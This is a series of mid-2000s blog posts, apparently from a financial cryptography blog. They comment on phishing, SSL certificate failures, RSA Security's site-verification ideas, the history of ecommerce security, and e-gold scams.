    Now someone over the other side of the phishing war is saying that he sees yet other tribes hiding in their fiefdoms, and I don't even know which tribes he's referring to. Gadi Evron concludes:

    -opinion-Our fault, us, the people who run these communities and global efforts, for being over-secretive on issues that should be public and thus also neglecting the issues that should really remain under some sort of secrecy, plus preventing you from defending yourself.

    Us, for being snobbish dolts and us, for thinking we invented the wheel, not to mention that we know everything or some of us who try to keep their spots of power and/or status by keeping new blood out (AV industry especially, the net-ops community is not alone in the sin of hubris).

    It’s time to wake up. The Internet is not about to die tomorrow and there is a lot of good effort from a lot of good people going around. Amazing even, but it is time to wake up and move, as we are losing the battle and the eventual war.

    Cyber-crime is real crime, only using the net. Cyber-terrorism will be here one day. If we can’t handle what we have on our plate today or worse, think we are OK, how will we handle it when it is here?

    Posted by iang at 08:03 AM | Comments (2) | TrackBack

    February 14, 2006

    Todd Boyle: value of transactions versus security model

    Todd Critiques! iang wrote:

    > Financial Cryptography Update: Brand matters (IE7, Skype, Vonage, Mozilla)
    > [........]
    > No, brand is a shorthand, a simple visual symbol that points to the
    > entire underlying security model. Conventional bricks&mortar
    > establishments use a combination of physical and legal methods
    > (holograms and police) to protect that symbol, but what Trustbar has
    > shown is that it is possible to use cryptography to protect and display
    > the symbol with strength, and thus for users to rely on a simple visual
    > icon to know where they are.

    >
    > Hopefully, in a couple of years from now, we'll see more advanced, more
    > thoughtful, more subtle comments like "the secured CA brand display
    > forms an integral part of the security chain. Walking along this
    > secured path - from customer to brand to CA to site - users can be
    > assured that no false certs have tricked the browser."


    The statement above seems incorrect to me, and inconsistent with statements you have made for many years.

    Any security that works on ordinary general purpose computers is going to work as long as one of the following: no high value transactions at stake, no large numbers of users, and.or not in the marketplace very long.

    In other words, any mac or windows or linux thing that gets into common use by very many people, that actually has any money at stake, will be cracked before very long. There is some type of a destruction curve that starts out slow, then reaches a steep slope or catastrophic collapse, again depending on how much money is at stake, aggregated over the number of users.

    I'm afraid this will be true until there are two elements introduced: more people, real people in the community, involved in the day-to-day operation of our identity and reputation mechanisms, and, a signing device that is guaranteed to perform its function for the long term and I don't mean 99.999% but 100%. However humble its function, to be adopted at all, it must be 100% even if that's artificially nailed down by some sort of intermediary, some sort of insurance as we see with credit cards. Why is this taking so long to appear?!

    In closing, we had Bruce Schneier in Seattle last weekend,

    Todd


    Sunday, February 12, 2006 - Page updated at 12:00 AM
    500 show up to hear security guru
    By Tan Vinh
    Seattle Times staff reporter

    Bruce Schneier once worked for the Defense Department.

    Since the disclosure last month that the government authorizes warrantless domestic spying, the water-cooler chats and classroom debates have raged over privacy and constitutional rights.

    But Bruce Schneier, the security guru who has rock-star status among crypto-philes, offered another take on the matter to a crowd of more than 500 people at the American Civil Liberties Union convention at the University of Washington on Saturday: This computer-eavesdropping stuff doesn't really work.

    "When you have computers in charge telling people what to do, you have bad security," said Schneier, who worked for the U.S. Department of Defense in the 1980s.

    Schneier, who won't reveal what he did for the Defense Department other than to say it's related to communications and security, said the domestic-eavesdropping program relies on computers to pick up words such as "bomb," "kill" or "president" in conversations and flag the participating parties as potential suspects.

    Last month, the Bush administration acknowledged authorizing the National Security Agency to intercept e-mails and phone calls without warrants in cases where one party is outside the United States.

    "Technology is static," Schneier said. "It doesn't adapt. But people can adapt to whatever is going on," he said. "You are better off" hiring more FBI agents to gather intelligence.

    The security is not worth the cost because the computers generate too many false alarms, Schneier said.

    "Replacing people with technology hardly ever works."

    With his thinning hair in a ponytail, Schneier looked more like a hippie than a cryptography expert whose books have gained cult status and whose appearances draw standing-room-only crowds.

    Here to speak about the nation's concern with security since the Sept. 11, 2001, attacks, the 43-year old Minneapolis resident suggested everyone step back and realize "terrorist attacks are rare. They hardly ever happen."

    A funny thing happens when people get scared, he said. People give up their freedom or liberties to authority. And politicians create "movie plots" of attacks at maybe the Super Bowl or the New York subways, as if terrorists couldn't attack another event or the subway stations in Boston, he said.

    "Security that requires us to guess right" is not worth the cost because there are too many potential targets, he said.

    Tan Vinh: 206-515-5656 or tvinh@seattletimes.com

    Posted by iang at 12:19 PM | Comments (1) | TrackBack

    SSL phishing, Microsoft moves to brand, and nyms

    fm points to Brian Krebs who documents an SSL-protected phishing attack. The cert was issued by Geotrust:

    Now here's where it gets really interesting. The phishing site, which is still up at the time of this writing, is protected by a Secure Sockets Layer (SSL) encryption certificate issued by a division of the credit reporting bureau Equifax that is now part of a company called Geotrust. SSL is a technology designed to ensure that sensitive information transmitted online cannot be read by a third-party who may have access to the data stream while it is being transmitted. All legitimate banking sites use them, but it's pretty rare to see them on fraudulent sites.

    (skipping details of certificate manufacturing...)

    Once a user is on the site, he can view more information about the site's security and authenticity by clicking on the padlock located in the browser's address field. Doing so, I was able to see that the certificate was issued by Equifax Secure Global eBusiness CA-1. The certificate also contains a link to a page displaying a "ChoicePoint Unique Identifier" for more information on the issuee, which confirms that this certificate was issued to a company called Mountain America that is based in Salt Lake City (where the real Mountain America credit union is based.)

    The site itself was closed down pretty quickly. For added spice beyond the normal, it also had a ChoicePoint unique Identifier in it! Over on SANS - something called the Internet Storm Center - Handler investigates why malware became a problem and chooses phishing. He has the Choicepoint story nailed:

    I asked about the ChoicePoint information and whether it was used as verification and was surprised to learn that ChoicePoint wasn't a "source" of data for the transaction, but rather was a "recipient" of data from Equifax/GeoTrust. According to Equifax/GeoTrust, "as part of the provisioning process with QuickSSL, your business will be registered with ChoicePoint, the nation's leading provider of identification and credential verification services."

    LOL... So now we know that the idea is to get everyone to believe in trusting trust and then sell them oodles of it. Quietly forgetting that the service was supposed to be about a little something called verification, something that can happen when there is no reason to defend the brand to the public.

    Who would'a thunk it? In other news, I attended an informal briefing on Microsoft's internal security agenda recently. The encouraging news is that they are moving to put logos on the chrome of the browser, negotiate with CAs to get the logos into the certificates, and move the user into the cycle of security. Basically, Trustbar, into IE. Making the brand work. Solving the MITM in browsers.

    There are lots of indicators that Microsoft is thinking about where to go. Their marketing department is moving to deflect attention with 10 Immutable Laws of Security:

    Law #1: If a bad guy can persuade you to run his program on your computer, it's not your computer anymore
    Law #2: If a bad guy can alter the operating system on your computer, it's not your computer anymore
    Law #3: If a bad guy has unrestricted physical access to your computer, it's not your computer anymore
    Law #4: If you allow a bad guy to upload programs to your website, it's not your website any more
    Law #5: Weak passwords trump strong security
    Law #6: A computer is only as secure as the administrator is trustworthy
    Law #7: Encrypted data is only as secure as the decryption key
    Law #8: An out of date virus scanner is only marginally better than no virus scanner at all
    Law #9: Absolute anonymity isn't practical, in real life or on the Web
    Law #10: Technology is not a panacea

    Immutable! I like that confidence, and so do the attackers. #9 is worth reading - as Microsoft are thinking very hard about identity these days. Now, on the surface, they may be thinking that if they can crack this nut about identity then they'll have a wonderful market ahead. But under the covers they are moving towards that which #9 conveniently leaves out - the key is the identity is the key, and its called psuedonymity, not anonymity. Rumour has it that Microsoft's Windows operating system is moving over to a psuedonymous base but there is little written about it.

    There was lots of other good news, too, but it was an informal briefing, so I informally didn't recall all of it. Personally, to me, this means my battle against phishing is drawing to a close - others far better financed and more powerful are carrying on the charge. Which is good because there is no shortage of battles in the future.

    To close, deliciously, from Brian (who now looks like he's been slashdotted):

    I put a call in to the Geotrust folks. Ironically, a customer service representative said most of the company's managers are presently attending a security conference in Northern California put on by RSA Security, the company that pretty much wrote the book on SSL security and whose encryption algorithms power the whole process. When I hear back from Geotrust, I'll update this post.

    That's the company that also ditched SSL as a browsing security method, recently. At least they've still got the conference business.

    Posted by iang at 06:21 AM | Comments (1) | TrackBack

    January 07, 2006

    RSA comes clean: MITM on the rise, Hardware Tokens don't cut it, Certificate Model to be Replaced!

    In a 2005 document entitled Trends and Attitudes in Information Security that someone sent to me, RSA Security, perhaps the major company in the security world today, surveys users in 4 of the largest markets and finds that most know about identity theft, and most are somewhat scared of ecommerce today. (But growth continues, so it is not all doom and gloom.)

    This is an important document so I'll walk through it, and I hope you can bear with me until we get to the important part. As we all know all about identity theft, we can skip to the end of that part. RSA concludes its longish discussion on identity theft with this gem:

    Conclusion

    Consumers are, in many respects, their own worst enemies. Constantly opening new accounts and providing personal information puts them at risk. Ally this to the naturally trusting nature of people and it is easy to see why Man-in-the-middle attacks are becoming increasingly prevalent. The next section of this e-Book takes a closer look at these attacks and considers how authentication tokens can be a significant preventative.

    Don't forget to blame the users! Leaving that aside, we now know that MITM is the threat of choice for discerning security companies, and it's on the rise. I thought that last sentance above was predicting a routine advertisement for RSA tokens, which famously do not cover the dynamic or live MITM. But I was wrong, as we head into what amounts to an analysis of the MITM:

    9. Offline [sic] Man-in-the-Middle attack

    With online phishing, the victim receives the bogus e-mail and clicks through to the falsified Web site. However, instead of merely collecting rapidly changing passwords and contact information, the attacker now inserts himself in the middle of an online transaction stream. The attacker asks for and intercepts the user’s short-time-window, onetime password and stealthily initiates a session with the legitimate site, posing as the victim and using the victim’s just-intercepted ID and OTP.

    Phishing is the MITM. More importantly, the hardware tokens that are the current rage will not stop the realtime attack, that which RSA calls "online phishing." That's a significant admission, as the RSA tokens have a lot to do with their current success (read: stock price). The document does not mention the RSA product by name, but that's an understandable omission.

    Maybe, your pick.... But let's get back to reading this blurb. Here comes the important part! Heads up!

    The need for site verification

    The proper course is for the computer industry to create a comprehensive method and infrastructure for site verification—mutual authentication by both site host and user. Most authentication is about knowing who the user is—but the user wants the same level of assurance that he’s dealing with the right/trusted site. Site verification creates a two-way authentication process. Different security advocates have proposed a couple of alternatives to achieve site verification.

    Host Authentication
    In this method, the legitimate site host presents a value onscreen. The user must compare that value to what’s displayed on the token and ensure it matches....

    Read it again. And again, below, so you don't think I make this shit up. RSA Security is saying we need a site verification system, and not mentioning the one that's already there!

    SSL and certificates and the secure browsing system are now persona non gratis, never to be mentioned again in corporate documents. The history book of security is being rewritten to remove reference to a decade or so of Internet lore and culture. Last time such a breathtaking revision occurred was when Pope Gregory XIII deleted 10 days from the calendar and caused riots in the streets by people wanting their birthdays back. (Speaking of which, did anyone see the extra second in the new year? I missed it, darn it. What was it like?)

    So, what now? I have my qualms about a company that sells a solution in one decade, makes out like bandits, and then gets stuck into the next decade selling another solution for the same problem. I wrote recently about how one can trust a security project more when it admits a mistake than when it covers it up or denies its existance.

    But ones trust or otherwise of RSA Security's motives or security wisdom is not at issue, except for those stock price analysts who hadn't figured it out before now. The important issue here for the Internet community is that when RSA admits, by default or by revisionism, that the certificates in the secure browsing model need to be replaced, that's big news.

    This is another blackbird moment. RSA wrote the rule book when it came to PKI and certificates. They were right in the thick of the great ecommerce wars of 1994-1995. And now, they are effectively withdrawing from that market. Why? It's had a decade to prove itself and hasn't. Simple. Some time soon, the rest of the world will actually admit it too, so better be ahead of the curve, one supposes.

    Get the message out - RSA has dumped the cert. We still have to live with it, though, so there is still lots of work to be done. Hundreds of companies are out there pushing certificates. Thousands of developers believe that these things work as is! A half-billion or so browsers carry the code base.

    Without wishing to undermine the importance of RSA Security's switch in strategy, they do go too far. All that certificate code base can now be re-factored and re-used for newer, more effective security models. I'll leave you with this quasi-recognition that RSA is searching for that safe answer. They're looking right at it, but not seeing it, yet.

    Browser plug-in

    With this method, a locally resident browser plug-in cryptographically binds the one-time password (or challenge-response) to the legitimate site—i.e., the actual URL, rather than the claimed site name. This means that the password is good only for the legitimate site being visited.
    This is an implicit level of site verification and is a far better approach than token-based host authentication and can prevent man-in-the-middle attacks. There are drawbacks and vulnerabilities, however. First, a browser plug-in presents all of the attendant issues of client software: it must be successfully loaded by the customer and updated, supported, and maintained by the site host. And, if the PC has been compromised through some form of co-resident malware, it remains vulnerable to subsequent exploitation.

    Huh. So what they are saying is "we see good work done in plugins. But we don't see how we can help?" Well, maybe. I'd suggest RSA Security could actually do good work by picking up something like Trustbar and re-branding it. As Trustbar has already reworked the certificate model to address phishing, this provides the comfortable compromise that RSA Security needs to avoid the really hard questions. Strategically, it has everything a security company could ever want, especially one cornered by its past.

    I said that was the last, but I can't resist one more snippet. Notice who else is dropped from the lexicon:

    In the end, trust is a human affair and the right technology foundations can create a much stronger basis for forming that trusted relationship. As consumers and vendors continue to respond to new and emerging threats to identity theft, it will be essential for them to bear these principles in mind. For more information about any of the issues raised in this document please visit www.rsasecurity.com or contact:

    If anyone can send me the URL for this document I'll gladly post it. All in all, thanks to RSA Security for coming clean. Better late than never! Now we can get to work.

    Posted by iang at 03:45 PM | Comments (10) | TrackBack

    January 01, 2006

    13 reasons why security is not a "Requirement"

    Jeremy Epstein asked someone why they didn't ask "is it secure?" in the evaluation of a security product. This someone, a government procurer, had no answer other than surprise! Why is this, more generally, Epstein asks? Here's his list:

    • People assume the vendor takes care of it.
    • They don't know that they should ask.
    • They don't know what to ask for.
    • They're uncomfortable with the technology.
    • They've made a conscious risk assessment.
    • They think they're safe.
    • They use vulnerability metrics.
    • They simply don't believe vendor claims are trustworthy.
    • They have reduced security requirements in the POC.
    • They don't think it's their job.
    • They know that their organization doesn't care.
    • They think standards take care of the problem.
    • They perform their own testing.


    Check the main article for his reasoning on all of these questions. It is encouraging to hear such open questioning of the security world; readers here will know that I advance the Hypotheses that neither vendor nor purchaser know whether a product is "secure". See 8 and 3 above, in that order.

    One quibble. In asking "why not," we do enter a troublesome area, scientifically speaking. There are always a hundred reasons not to do something but figuring out which are the real factors and which are the rationalisations is hard. Generally, we as people do better at answering why we actively do something in the positive sense, than why we don't.

    If the question had been placed in the context of one of requirements ("why are you buying a security product") and results ("did the one you purchased meet your requirements") then more sense might have come out of it. Which is to say that not all security requirements should be viewed through the narrow lens of security but perhaps through the wider lens of procurement.

    Quibbles aside, an encouraging development.

    Posted by iang at 02:38 PM | Comments (0) | TrackBack

    December 30, 2005

    GP4.3 - Growth and Fraud - Case #3 - Phishing

    We would be remiss if we didn't also measure the theory of GP (GP1, GP2, GP3) against that old hobby horse, phishing.

    When ecommerce burst on the scene as an adjunct to browsing, it pretty quickly emerged as "taking credit card orders over the net." This took off fairly easily as the FORM in HTML allowed ready collection of these data, and many existing credit card merchants simply shipped as if the new orders were MOTO - mail-order/telephone-order ones.

    There were a few niggles around though. Security was thought to be a bit loose, as all these credit cards were flashing around on the open net. Compare this to the existing usage where credit cards were handed over to waiters and waitresses for copying back at the counter, or where orders taken over telephone resulted in goods generally being shipped to billing addresses, and it was either scary or not scary, depending on how closely you really understood the cycle. Nobody ever showed that credit cards were being snooped on the net, although telnet passwords were being scarfed up in large numbers (a threat that led separately to the development of hyper-successful SSH) so we can see here the seeds of a GP-problem.

    Obviously a little crypto would have helped, and SSL in its first version ("v1") was duly floated to the crypto community sometime in 1994. All things being equal, this would have been acceptable to deal with the potential of fraud, but not all things were equal. In fact, so many things were not equal that this minor case has become what amounts to a major history lesson.

    In order to understand SSL it is necessary then to digress and understand the environment of the times. I present this as forces, a sort of institutional approach from economics (c.f., Michael Porter's Five Forces analysis). Here's the list of forces that were pushing around in 1994:

    1. Netscape's stellar growth, capped by the dotcom fairy story of their IPO, had put Netscape firmly in the driver's seat of ecommerce. Unfortunately, they couldn't sell their flagship product because they had set a price tag of $50 for the browser but nicely left it free for personal use or somesuch. (As events were to show, Microsoft simply boxed them in by shipping their browser for free. Only Microsoft could afford to win that battle.) Force: Netscape needed big friends, big products, big revenues and something to spend its IPO cash on. Result: the pressure was on the ecommerce division to save Netscape's bacon.
    2. Porn! Insiders report that fully half of early SSL use was by adult sites which needed to reduce the risks of delivering the product to the wrong party. Paying for certs or secured servers was chicken feed compared to being shown to deliver to the wrong "customer." However, what they didn't want was the load that ground their servers into the dust - megabyte images being far different animals to kilobyte credit card transfers. Hence, cue in some early hard engineering questions: load balancing, page caching, proxy servers, page pre-loading from customers who's interest in security was unusual and unpredicted.
    3. Fear and Loathing and the Payments Industry. The credit card companies were scared witless by the arisal of new payment companies like First Virtual (a sort of forerunner to PayPal) and before them, DigiCash, and lobbied to anyone who would listen to get some 'protection' for ecommerce. One idea that they liked was the certificate, that some had mused on as being the "missing link" in the security of SSL. Better yet, those that controlled lots of merchants (MCI and AT&T in this case) could envisage delivering the certificates to the merchants, and leaving the outsiders to fend for themselves; in other words, a classic barrier to entry. But it also appealed to Netscape because pushing certificates not only boosted sales of their secure server, it maintained their control over the protocol and found them some great new friends. Briefly.
    4. The crypto wars! The protagonists were the United States government in the person of Loius Freeh on the one hand and the network libertarians on the other. Although the USG was prepared to compromise on weak crypto which would have been fine for ecommerce, this wasn't good enough for the cypherpunks. Nothing short of complete freedom to implement super-strong crypto against any threat for any application was anything short of acceptable. As a side-effect to their religious war against "national technical means," any merchant who implemented anything short of 100% absolutely secure no risk guaranteed and certified crypto was hit by the indiscriminate pogrom of the free crypto crowd; the result of this "all or nothing" security approach was more often nothing than all.
    5. Hence another short footnote in the history of ecommerce arrived in the form of SSL being required to run at full crypto strength against the man who wasn't in the middle and against Eve who wasn't listening. Unfortunately, the machines of the time were not strong enough to push through sessions fast enough. Inevitably, as nothing short of full strength was adequate, and certs and triple DES were dimming the lights of ecommerceville by about 80-90%, the security space again split into SSL-mode for collecting credit cards and non-SSL mode for the rest. This made security itself inordinately difficult, as in classical military terms, there was now a gap between security models through which to attack, and security itself was now firewalled off from the main shopping process.
    6. The US Department of Defense's "COTS" dream. In the 90s, the DoD procurement monolith took on a new mission. In brief, they decided to offset their R&D costs onto general society, and move to purchasing commercial off-the-shelf equipment, albeit directed towards government needs. The unwritten offer given to suppliers like Netscape was to sell DoD standard COTS software, split off portions of the revenue stream at appropriate points to fund government-specific development, and then sell DoD "COTS" with additional new "GOTS" features. Recalling that the US government was the single largest source of Netscape revenues, this was no small offer!
    7. The NSA's PKI dream. The American spook community decided to bet the farm on PKI as a way to slip into place a crypto regime dependent on a pre-rigged infrastructure. In perhaps following the COTS dream of their peers over at DoD, NSA pushed procurement into the direction of requiring and acquiring large PKI structures and they pushed certain suppliers - you know who I mean - into valuable PKI nodes and roles so as to make sure the(ir) infrastructure was in place. The theory was that this would then explode into life, we'd all "get PKI" religiously and then find ourselves hooked.
    8. The DoJ's non-repudiation dream. Some legal people (and not a few techies) believed that a digital signature was in some ways analogous to a human signature. They reasoned that if they could get the non-repudiation aspects slipped into the Internet, they'd be able to control and prosecute the criminals to come. This meant laws, structure, authorities, and above all, control.
    9. Identity Solves Every Security Problem. Once people realised that the certificate was like an identity, business plans bloomed like a thousand flowers based on the right to sell these identities back to their owners. Billion dollar cash flows based on the ability to sell a $100 cert to 100 million Americans floated around Wall Street. We say in (real) warfare that no plan of battle survives the first shot, etc etc, and in relatively short order, the certificate authority space was turned upside down by competitors diving in and demanding access. Netscape lost control of the space, and made all CAs equivalent so it wasn't seen to favour anyone. Inevitably, this reduced the security of the system to where certificates acquired popup-avoidance status, because there was no differentiation and certificates became a bottom-feeding business.
    10. The patent wars! RSADSI and Cylink were engaged in battle over public key crypto standards. Also sparring was NIST with DSA and that Canadian company with EC. Ultimately won by RSA, this also saw a whole bunch of weird and wonderful licensing agreements forced on customers. No points for guessing what features were withheld in the licences offered to which customers!


    fig 8. the Battle for Ecommerce

    Heady stuff for conspiracy theorists! Now, the beauty of the above forces is that they don't all have to be true even though I believe them to be fair if one-sided representations. Sufficient of these forces still sum to a statistically relevant picture. We can reach the conclusions we need, so let's go there right now.

    In the face of all these pressures, Netscape found itself adding certificate-based protection with a new upgraded form of SSL called v2. (Even SSL v2 was a little loose, so they quickly hired an external consultant to come in and do v3, although that form of SSL still hasn't properly deployed in your default secure sessions as yet, so it must have been OK to secure ecommerce with v2!)

    The end result was the balkanisation of the Internet's security space. Various large and famous companies carved up the space amongst them and created the CA structure that we know today. Certificates went from full-PKI-wholesome-trust mode to popup-avoidance certificate manufacturing mode in the blink of a venture capitalist's eye. Verisign made out like bandits on the stock market. The USG chipped in with some worry about enemies of the state, and forced a mishmash of cipher suites and options and above all, the certificates that a dozen agencies put so much store by. The cypherpunks added their "all or nothing" politics to the mix and created the "all and nothing" nightmare. Netscape themselves were soon embroiled in a bid for survival as Microsoft defeated them on their own ground and went on to all but own ecommerce space. And out in ecommerceville itself, they ruined the security by breaking the model down the center.

    So what was all that about, in summary form? SSL v1 was put in place for a predicted, but so far unvalidated threat. The lack of focus on a clear validated threat left the space vulnerable to capture - and SSL v2 duly became the battle ground of many, none of whom had much concern about security of the browser users' sessions but were quite willing to use it as a cassus belli in the war against someone or other.

    The question that I often pondered on was why certificates were added to SSL. From a technical pov, they are too expensive for the mission, too heavy. Now that I've investigated the forces and listed them out, I can see the error of my ways - obviously this had nothing to do with security, and the question is best off couched as "how could Netscape have possibly avoided putting a certificate-based PKI into the security protocol?" And that's the conclusion we need: there is no way they could have avoided it. The forces were just too strong.

    Back to security. A little-known small-time fraud turned up with the name of phishing. Originally, this was a very crude and old claims scam on AOL, where the A.O.Lusers were sold some bogus product and had their credit cards re-used elsewhere. By the time AOL had been all phished out, the model was well understood and well tested, so it was natural to start somewhere else.


    fig 9. the Battle of Online Banking

    Fast forward to the new millenium, and that somewhere else was online payment systems and banks. I.e., where the money is. The first known phishing attack on a financial operator was June 2001 against e-gold. Delivered using spam techniques, users were tricked into entering their passwords into near-enough websites. And it was here that the browser security model was first challenged and failed within moments. The one thing that the certificate was supposed to do was tell the user that they were on the right site, plus or minus some details. But by the time the attackers arrived, the security model had been so abused by other agendas that it wasn't capable of putting up a fight against a real criminal.

    Worse, the huge infrastructure that had been built up - crypto libraries, protocol libraries, browser manufacturers, web server manufacturers, standards committees, certificate authorities, auditors, audit standards models, digital signature laws, PKI rollouts and a cast of a thousand onlookers - proved itself simply incapable of accepting the threat for what it was - a successful attack on the browser's security model.

    We're still there - working with a security model that was envisaged as a nice quick and dirty fix for credit cards in the first instance, in the second instance squabbled over by a bunch of disparate interests, and in the third instance broken like a child's toy sword the day after Christmas when the first bully turned up and wacked it with a stick. Worse, in the fourth instance, phishing has invested its proceeds and diversified into the trojan / malware and data breach spaces so any fixes delivered are not going to stem the tide of red ink losses.

    It might be hard to tell when GP was reached in ecommerce. But the real underlying conclusion to draw from this case is this: do not put the security model in place too early! In the case of phishing by the time the model was needed, it was incapable of protecting and of adjusting against the threat. The cost to this impatience can be measured by integrating the red curve in fig. 9 - it's all the area under the curve.


    This case study concludes the story of Growth and Fraud:

    Posted by iang at 07:51 PM | Comments (17) | TrackBack

    Netcraft - 450 phishing cases using SSL / HTTPS certs

    Lynn points to techworld that points to NetCraft that states it has confirmed 450 HTTPS phishing attacks:

    In its first year, the Netcraft Toolbar Community has identified more than 450 confirmed phishing URLs using "https" urls to present a secure connection using the Secure Sockets Layer (SSL). The number of phishing attacks using SSL is significant for several reasons. Anti-phishing education initiatives have often urged Internet users to look for the SSL "golden lock" as an indicator of a site's legitimacy. Although phishers have been using SSL in attacks for more than a year, the trend seems to have drawn relatively little notice from users and the technology press.

    Case in point: The use of SSL certificates in phishing scams made headlines in September when a security vendor issued a press release warning of a scam in which a spoofed phishing site used a self-signed certificate, presenting a gold lock icon but also triggering a browser warning that the certificate was not recognized. In this case, the phishers were banking on the likelihood that many users will trust the padlock and ignore the certificate warning. Despite the attention, the attack wasn't particularly new or novel.

    The Netcraft Toolbar community has identified many similar phishing attacks in which spoof sites use a certificate that can be expected to trigger a browser warning, in hopes that some victims will view the "Do you want to proceed?" pop-up and simply click "Yes." Numerous scams have used a hosting company's generic shared server SSL certificate with a spoof site housed on a "sound-alike" URL lacking its own certificate.

    The beauty of the golden lock icon has been that it simplified complex security concepts into a single symbol that non-technical users could understand and trust. Phishing scams designed to prompt security warnings raise the stakes, requiring users to understand what the browser warning is telling them, and how they should respond. Upcoming SSL-related interface changes in Internet Explorer 7 and other browers updates make a good start toward providing users with clearer information. But as we noted earlier this year, many banks are shifting their online banking logins to the unencrypted home pages of their websites, further muddling the issue of training customers to trust only SSL-enabled sites. The non-SSL presentation of these bank logins is already being incorporated into spoof pages.

    Interesting point - this came from their Toolbar community - a design I've frequently criticised! I'm still in search of the Perfect Phish by the end of the year, so as to meet my quota in predictions.

    Also see The Year in Phishing

    Posted by iang at 02:18 PM | Comments (0) | TrackBack

    December 26, 2005

    GP4.2 - Growth and Fraud - Case #2 - e-gold

    e-gold rocketed to success in late 1999 in a classical exponential growth curve that took everyone by surprise. Why the mathematics of growth continue to shock and awe has never been explained to me, but when you've just taken a technically bankrupt firm to a paper value of half a bill inside a year, such academic trivia has little import.

    For all that, at one point on the curve from second half of 1999 to first half of 2000, the e-gold payment system experienced in rapid succession:

    • rapidly growing exchange orders,
    • the first independent exchanger, albeit small and unwelcome, but followed by dozens more
    • a small group of vendors of supporting software services
    • a casino and a lottery game
    • investment from J.W.Zidar, later revealed as the owner/operator of a $72 million scam
    • bootstrap super-issues over the top of e-gold
    • a rash of fraudulent transactions from mainstream American online banks with swiss cheese ACH interfaces, and
    • a rampage of scams!

    Not necessarily in clear and consise order, and it should be recognised that those were turbulent, exciting and stressful times!

    The arisal of scams on e-gold bears studying. The first one identified was called Advance and it was a classic Ponzi scheme. In this model, new members join, advancing funds for investment, but the the supposed investments are used to pay off old investors. As long as new investors come in, older investors could be paid off, and could then perpetuate the myth of great returns. Sometime the music stops, though, and then the scam falls apart.


    fig 7. e-gold hits the GP point 1999 Q3

    There is some definitional discussion due around whether the scams that hit e-gold were attacks on the system or the members, and much debate as to whether it is e-gold's responsibility to treat it or not. But for the present purposes, the result is clear: e-gold was worth stealing and thus GP was achieved. The security of the system (bog-standard SSL) was, during the time of interest, adequate to the task of stopping hackers from stealing directly; so fraudsters simply moved to stealing from each other.

    Even as Advance was being unwound by e-gold, there were others in the pipeline. It is salutory that e-gold and other digital gold issuers took substantial and diverging steps to avoid the fate of scams. In contrast, the mutual funds industry hunkered down for a year or two ($3,000,000,000 in fines or so hardly scratched the surface), and now the signs are that it's business as usual - get your late orders in as slowly as you like! That's the difference between open governance and regulatory fiat, but that's the topic of other rants.

    And finally, that old favourite: Phishing.

    Posted by iang at 07:57 PM | Comments (2) | TrackBack

    December 24, 2005

    A new security metric?

    I have a sort of draft paper on security metrics - things which I observe are positive in security projects. The idea is that I should be able to identify security projects, on the one hand, and on the other provide some useful tips on how to think past the press release. Another metric just leaped out and bit me from that same interview with Damien Miller:

    Why did you increase the default size of new RSA/DSA keys generated by ssh-keygen from 1024 to 2048 bits?

    Damien Miller: Firstly, increasing the default size of DSA keys was a mistake (my mistake, corrected in the next release) because unmodified DSA is limited by a 160-bit subgroup and SHA-1 hash, obviating the most of the benefit of using a larger overall key length, and because we don't accept modified DSA variants with this restriction removed. There are some new DSA standards on they way that use larger subgroups and longer hashes, which we could use once they are standardized and included in OpenSSL.

    We increased the default RSA keysize because of recommendations by the NESSIE project and others to use RSA keys of at least 1536 bits in length. Because host and user keys generated now will likely be in use for several years we picked a longer and more conservative key length. Also, 2048 is a nice round (binary) number.

    Spot it?

    Here it is again in bold:

    Damien Miller: Firstly, increasing the default size of DSA keys was a mistake (my mistake, corrected in the next release) because [some crypto blah blah]

    A mistake! Admitted in public! Without even a sense of embarrassment! If that's not a sign that the security is more important than the perception then I don't know what is...

    Still not convinced? When was the last time you ever heard anyone on the (opposing) PKI side admit a mistake?

    Posted by iang at 08:55 AM | Comments (9) | TrackBack

    December 14, 2005

    2005 in review - The Year I lost my Identity

    In the closing weeks of 2005, we can now look back and see how the Snail slithered its way across the landscape.

    1. Banks failed to understand phishing at any deep level. They failed in these ways:

    • Pushing out websites that offered Login boxes on unencrypted pages opens the door to phishing attacks and gets them the bank on Amir's Hall of Shame.
    • Rollout of two-factor authentication tokens -- a.k.a. SecureIds as promoted by RSADSI, as ordered by the FDIC, and as jumped on by the banks desperate to be seen to do something -- devices which only address one easily 'fixed' issue in phishing: realtime access. Yet, even as the bandwaggon was exceeding the speed limit, we already saw the first realtime atacks. I predicted that we'll see the first fully perfect attacks by the end of the year.
    • Banks experienced a wave of chill when Lopez sued Bank of America. Although they knew that they were in the right, they also knew this case would probably be lost. Or, at least, it was the beginning of the end of the easy risk separation.

    2. Browser manufacturers have moved slightly faster than your average glacier. Microsoft moved forward by announcing that phishing was a browser problem (Mozilla and KDE followed 8 months later), and again by putting some tools into the IE7 release. Another big step forward was announcing the switch-off of SSL v2.

    But Microsoft also moved backwards one step IMO by going for the "shared database of phishing alerts" idea pioneered by Netcraft. Computer scientists and security gurus are still scratching their heads over how that is ever going to work, given that it never worked the other several hundred times we tried it. And another step backwards was announced as Microsoft went for an upgraded super-authentication concept for CAs. Those CAs that pass their upgraded rules will get rewarded by the CA's name on the browser, and the site will appear in green. Unfortunately, this confirms Microsoft in the position of super-CA, as they've now taken a position of judgement. Worse, it probably won't do anything to address the security problems we have now. As James Donald says, "the revenue model [for certificates] is based on sprinkling holy water over communications, rather than actually providing security. Hence the proposal to address phishing by providing higher priced grades of holy water."

    3. Data hacking blew American innocence away when Choicepoint revealed that they'd lost about 150,000 data sets to a guy with a stolen credit card. That's identities, to the plebians. Instead of doing the right thing and looking sorry, they ducked and weaved. Unfortunately, the underlying spark was the California law that said you had to notify the victims. (Check out the full gory history at Adam's Choicepoint category)

    Within a month there were something like 6-8 large-scale copy cat victim companies. The sudden knowledge of actual public attention and actual duty of care and actual potential for damages electrified the corporates like they'd received the other famous sentance from California - deathrow. The year rolled on, and by the time it hit 50,000,000 sets of data -- people, identities, you but not me -- analysts got bored and stopped counting. Basically, all of them or as many as you'd ever need.

    4. Keylogging and malware and spyware slipped in and ruined -- totally and utterly destroyed -- any notion that *your Windows PC* was safe. It's a bit darn unfair as Microsoft did manage to improve the security of their most famous and most hackable platform, but to little avail.

    Underground rumour has had it for some time that corporates were also playing the same game using weaknesses deliberately left in by the manufacturer, and we got some great evidence when Sony was caught in the act. In order to protect some 32 or so of their CDs, they installed root kits across millions of machines (it's not really clear what it means see half a million DNS servers).

